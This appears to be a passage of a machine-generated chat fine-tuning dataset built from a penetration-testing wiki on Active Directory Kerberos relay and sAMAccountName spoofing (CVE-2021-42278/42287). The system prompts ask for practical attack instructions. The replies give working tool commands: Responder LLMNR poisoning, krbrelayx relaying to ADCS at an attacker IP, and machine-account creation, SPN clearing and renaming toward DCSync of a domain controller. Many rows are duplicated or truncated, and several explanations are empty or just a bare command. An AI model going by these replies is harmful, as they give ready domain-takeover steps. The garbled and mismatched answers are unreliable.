Synacktiv has demonstrated in this article.\n\n> [!NOTE]\n> Note that the technique will not work for SMB clients, because it is not possible to opportunistically respond via LLMNR to non-existent hostnames in SMB with a response name containing a CREDENTIAL_TARGET_INFORMATION structure. This structure is explained in the previous section.\n>\n> > Another limitation is that, according to our tests, other local name resolution protocols such as mDNS and NBTNS cannot be abused to carry out the attack. Indeed, while LLMNR responses contain both the query sent by the client and the response, this is not the case of mDNS and NBTNS, which only contain responses.[...]\n> >\n> > Because mDNS and NBTNS only contain name resolution responses, changing the answer name will actually confuse the HTTP clients, which will not be able to make the connection between the query they sent, and the modified response.\n> >\n> > _(Quentin Roland, January 27, 2025, source)_\n>\n> Finally, most HTTP clients use the Kerberos Negociate package, which forces the signature to be set up. This means that even HTTP authentication cannot be relayed to LDAP.\n\nHere are the different steps to perform the attack:\n\n1. Set up an LLMNR poisoner, for example with Responder (Python).\n2. An HTTP client fails to resolve a hostname, for any reason.\n3. The LLMNR poison", "metadata": {"corpus_index": 705, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Kerberos relay - Abuse from multicast poisoning?"}, {"role": "assistant", "content": "When a web server requests Kerberos authentication, it does not use the destination URL to determine the SPN for which an ST is to be retrieved, but rather the response name of the DNS response. Nominally, these two elements should coincide. The client accesses a login URL, performs the DNS query for the server's FQDN, then performs the ST request from the DNS response, and constructs the AP-REQ.\n\nHowever, an attacker in a Man-in-the-Middle position can poison the DNS response and indicate that the HTTP server's FQDN points to him. In this way, the victim will obtain an ST for the server, construct the AP-REQ, and send it to the attacker. This is the attack Synacktiv has demonstrated in this article.\n\n> [!NOTE]\n> Note that the technique will not work for SMB clients, because it is not possible to opportunistically respond via LLMNR to non-existent hostnames in SMB with a response name containing a CREDENTIAL_TARGET_INFORMATION structure. This structure is explained in the previous section.\n>\n> > Another limitation is that, according to our tests, other local name resolution protocols such as mDNS and NBTNS cannot be abused to carry out the attack. Indeed, while LLMNR responses contain both the query sent by the client and the response, this is not the case of mDNS and NBTNS, which only contain responses.[...]\n> >\n> > Because mDNS and NBTNS only contain name resolution responses, changing the answer name will actually confuse the HTTP clients, which will not be able to make the connection between the query they sent, and the modified response.\n> >\n> > _(Quentin Roland, January 27, 2025, source)_\n>\n> Finally, most HTTP clients use the Kerberos Negociate package, which forces the signature to be set up. This means that even HTTP authentication cannot be relayed to LDAP.\n\nHere are the different steps to perform the attack:\n\n1. Set up an LLMNR poisoner, for example with Responder (Python).\n2. An HTTP client fails to resolve a hostname, for any reason.\n3. The LLMNR poison"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Kerberos relay - Abuse from multicast poisoning?", "response": "When a web server requests Kerberos authentication, it does not use the destination URL to determine the SPN for which an ST is to be retrieved, but rather the response name of the DNS response. Nominally, these two elements should coincide. The client accesses a login URL, performs the DNS query for the server's FQDN, then performs the ST request from the DNS response, and constructs the AP-REQ.\n\nHowever, an attacker in a Man-in-the-Middle position can poison the DNS response and indicate that the HTTP server's FQDN points to him. In this way, the victim will obtain an ST for the server, construct the AP-REQ, and send it to the attacker. This is the attack Synacktiv has demonstrated in this article.\n\n> [!NOTE]\n> Note that the technique will not work for SMB clients, because it is not possible to opportunistically respond via LLMNR to non-existent hostnames in SMB with a response name containing a CREDENTIAL_TARGET_INFORMATION structure. This structure is explained in the previous section.\n>\n> > Another limitation is that, according to our tests, other local name resolution protocols such as mDNS and NBTNS cannot be abused to carry out the attack. Indeed, while LLMNR responses contain both the query sent by the client and the response, this is not the case of mDNS and NBTNS, which only contain responses.[...]\n> >\n> > Because mDNS and NBTNS only contain name resolution responses, changing the answer name will actually confuse the HTTP clients, which will not be able to make the connection between the query they sent, and the modified response.\n> >\n> > _(Quentin Roland, January 27, 2025, source)_\n>\n> Finally, most HTTP clients use the Kerberos Negociate package, which forces the signature to be set up. This means that even HTTP authentication cannot be relayed to LDAP.\n\nHere are the different steps to perform the attack:\n\n1. Set up an LLMNR poisoner, for example with Responder (Python).\n2. An HTTP client fails to resolve a hostname, for any reason.\n3. The LLMNR poison", "metadata": {"corpus_index": 705, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use python3 for kerberos relay - abuse from multicast poisoning?"}, {"role": "assistant", "content": "python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use python3 for kerberos relay - abuse from multicast poisoning?", "response": "python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME", "metadata": {"corpus_index": 706, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberos relay - Abuse from multicast poisoning?"}, {"role": "assistant", "content": "python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberos relay - Abuse from multicast poisoning?", "response": "python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME", "metadata": {"corpus_index": 706, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME`?"}, {"role": "assistant", "content": "This command is used for kerberos relay - abuse from multicast poisoning. Abuse from multicast poisoning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 Responder.py -I $INTERFACE -N $RELAY_TARGET_NETBIOSNAME`?", "response": "This command is used for kerberos relay - abuse from multicast poisoning. Abuse from multicast poisoning", "metadata": {"corpus_index": 706, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the python3 command to kerberos relay - abuse from multicast poisoning"}, {"role": "assistant", "content": "python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the python3 command to kerberos relay - abuse from multicast poisoning", "response": "python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User", "metadata": {"corpus_index": 707, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Kerberos relay - Abuse from multicast poisoning"}, {"role": "assistant", "content": "python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Kerberos relay - Abuse from multicast poisoning", "response": "python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User", "metadata": {"corpus_index": 707, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User`?"}, {"role": "assistant", "content": "This command is used for kerberos relay - abuse from multicast poisoning. Abuse from multicast poisoning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 krbrelayx.py --target 'http://$ADCS_FQDN/certsrv/' -ip $ATTACKER_IP --adcs --template User`?", "response": "This command is used for kerberos relay - abuse from multicast poisoning. Abuse from multicast poisoning", "metadata": {"corpus_index": 707, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about sAMAccountName spoofing - Theory"}, {"role": "assistant", "content": "In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about sAMAccountName spoofing - Theory", "response": "In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.", "metadata": {"corpus_index": 708, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for sAMAccountName spoofing - Theory"}, {"role": "assistant", "content": "In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for sAMAccountName spoofing - Theory", "response": "In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.", "metadata": {"corpus_index": 708, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain sAMAccountName spoofing - CVE-2021-42278 - Name impersonation"}, {"role": "assistant", "content": "Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain sAMAccountName spoofing - CVE-2021-42278 - Name impersonation", "response": "Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.", "metadata": {"corpus_index": 709, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for sAMAccountName spoofing - CVE-2021-42278 - Name impersonation"}, {"role": "assistant", "content": "Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for sAMAccountName spoofing - CVE-2021-42278 - Name impersonation", "response": "Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.", "metadata": {"corpus_index": 709, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does sAMAccountName spoofing - CVE-2021-42287 - KDC bamboozling work?"}, {"role": "assistant", "content": "When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user :exploding_head:.\n\n> [!TIP]\n> > S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group.\n> > \n> > _(Elad Shamir in his article Wagging the Dog)_"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does sAMAccountName spoofing - CVE-2021-42287 - KDC bamboozling work?", "response": "When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user :exploding_head:.\n\n> [!TIP]\n> > S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group.\n> > \n> > _(Elad Shamir in his article Wagging the Dog)_", "metadata": {"corpus_index": 710, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for sAMAccountName spoofing - CVE-2021-42287 - KDC bamboozling"}, {"role": "assistant", "content": "When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user :exploding_head:.\n\n> [!TIP]\n> > S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group.\n> > \n> > _(Elad Shamir in his article Wagging the Dog)_"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for sAMAccountName spoofing - CVE-2021-42287 - KDC bamboozling", "response": "When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user :exploding_head:.\n\n> [!TIP]\n> > S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group.\n> > \n> > _(Elad Shamir in his article Wagging the Dog)_", "metadata": {"corpus_index": 710, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of sAMAccountName spoofing - Machine Account"}, {"role": "assistant", "content": "The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.\n\nThe attack can then be conducted as follows.\n\n1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)\n2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278\n3. Request a TGT for the controlled machine account\n4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)\n5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287\n6. Get access to the domain controller (i.e. DCSync)\n\n> [!NOTE]\n> At the time of writing this recipe, some of the tools and features that allow exploitation of these vulnerabilities are still in development\n> \n> * Impacket's getST: https://github.com/SecureAuthCorp/impacket/pull/1202\n> * Impacket's renameMachine: https://github.com/SecureAuthCorp/impacket/pull/1224\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, the steps mentioned above can be conducted with\n\n* krbelayx's (Python) addspn script for the manipulation of the computer's SPNs\n* Impacket's (Python) scripts (addcomputer, renameMachine, getTGT, getST, secretsdump) for all the other operations\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of sAMAccountName spoofing - Machine Account", "response": "The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.\n\nThe attack can then be conducted as follows.\n\n1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)\n2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278\n3. Request a TGT for the controlled machine account\n4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)\n5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287\n6. Get access to the domain controller (i.e. DCSync)\n\n> [!NOTE]\n> At the time of writing this recipe, some of the tools and features that allow exploitation of these vulnerabilities are still in development\n> \n> * Impacket's getST: https://github.com/SecureAuthCorp/impacket/pull/1202\n> * Impacket's renameMachine: https://github.com/SecureAuthCorp/impacket/pull/1224\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, the steps mentioned above can be conducted with\n\n* krbelayx's (Python) addspn script for the manipulation of the computer's SPNs\n* Impacket's (Python) scripts (addcomputer, renameMachine, getTGT, getST, secretsdump) for all the other operations\n\n```bash", "metadata": {"corpus_index": 711, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through sAMAccountName spoofing - Machine Account"}, {"role": "assistant", "content": "The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.\n\nThe attack can then be conducted as follows.\n\n1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)\n2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278\n3. Request a TGT for the controlled machine account\n4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)\n5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287\n6. Get access to the domain controller (i.e. DCSync)\n\n> [!NOTE]\n> At the time of writing this recipe, some of the tools and features that allow exploitation of these vulnerabilities are still in development\n> \n> * Impacket's getST: https://github.com/SecureAuthCorp/impacket/pull/1202\n> * Impacket's renameMachine: https://github.com/SecureAuthCorp/impacket/pull/1224\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, the steps mentioned above can be conducted with\n\n* krbelayx's (Python) addspn script for the manipulation of the computer's SPNs\n* Impacket's (Python) scripts (addcomputer, renameMachine, getTGT, getST, secretsdump) for all the other operations\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through sAMAccountName spoofing - Machine Account", "response": "The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.\n\nThe attack can then be conducted as follows.\n\n1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)\n2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278\n3. Request a TGT for the controlled machine account\n4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)\n5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287\n6. Get access to the domain controller (i.e. DCSync)\n\n> [!NOTE]\n> At the time of writing this recipe, some of the tools and features that allow exploitation of these vulnerabilities are still in development\n> \n> * Impacket's getST: https://github.com/SecureAuthCorp/impacket/pull/1202\n> * Impacket's renameMachine: https://github.com/SecureAuthCorp/impacket/pull/1224\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, the steps mentioned above can be conducted with\n\n* krbelayx's (Python) addspn script for the manipulation of the computer's SPNs\n* Impacket's (Python) scripts (addcomputer, renameMachine, getTGT, getST, secretsdump) for all the other operations\n\n```bash", "metadata": {"corpus_index": 711, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 0. create a computer account?"}, {"role": "assistant", "content": "addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 0. create a computer account?", "response": "addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'", "metadata": {"corpus_index": 712, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 0. create a computer account?"}, {"role": "assistant", "content": "addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 0. create a computer account?", "response": "addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'", "metadata": {"corpus_index": 712, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 1. clear its SPNs"}, {"role": "assistant", "content": "addspn.py --clear -t 'ControlledComputer$' -u 'domain\\user' -p 'password' 'DomainController.domain.local'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 1. clear its SPNs", "response": "addspn.py --clear -t 'ControlledComputer$' -u 'domain\\user' -p 'password' 'DomainController.domain.local'", "metadata": {"corpus_index": 713, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 1. clear its SPNs?"}, {"role": "assistant", "content": "addspn.py --clear -t 'ControlledComputer$' -u 'domain\\user' -p 'password' 'DomainController.domain.local'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 1. clear its SPNs?", "response": "addspn.py --clear -t 'ControlledComputer$' -u 'domain\\user' -p 'password' 'DomainController.domain.local'", "metadata": {"corpus_index": 713, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 2. rename the computer (computer -> DC) in the context of penetration testing"}, {"role": "assistant", "content": "renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 2. rename the computer (computer -> DC) in the context of penetration testing", "response": "renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'", "metadata": {"corpus_index": 714, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 2. rename the computer (computer -> DC)"}, {"role": "assistant", "content": "renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'"}], "system": "You are a penetration testing and ethical 